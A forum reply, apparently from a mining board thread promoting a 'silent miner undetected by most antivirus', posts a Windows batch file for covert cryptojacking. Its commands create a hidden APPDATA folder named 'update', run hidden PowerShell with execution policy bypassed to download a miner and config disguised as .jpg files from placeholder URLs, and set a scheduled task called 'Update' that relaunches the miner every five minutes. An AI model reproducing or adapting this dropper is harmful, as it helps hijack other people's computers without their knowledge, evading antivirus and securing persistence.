Post
Topic
Board Mining (Altcoins)
Re: [Silent-Miner]🔥 Cryptonight Clean silent Miner Undetected By Most Antivirus 🔥
by
anders31
on 02/06/2018, 19:36:41 UTC
THE BATCH FILE

mkdir "%APPDATA%\update"
powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('Your miner Url.jpg ',\"$env:APPDATA\update\miner.exe\")
powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('Your miner config.jpg ',\"$env:APPDATA\update\config.json\")
SCHTASKS /Create /SC MINUTE /MO 5 /TN "Update" /TR "%APPDATA%\update\miner.exe"
Exit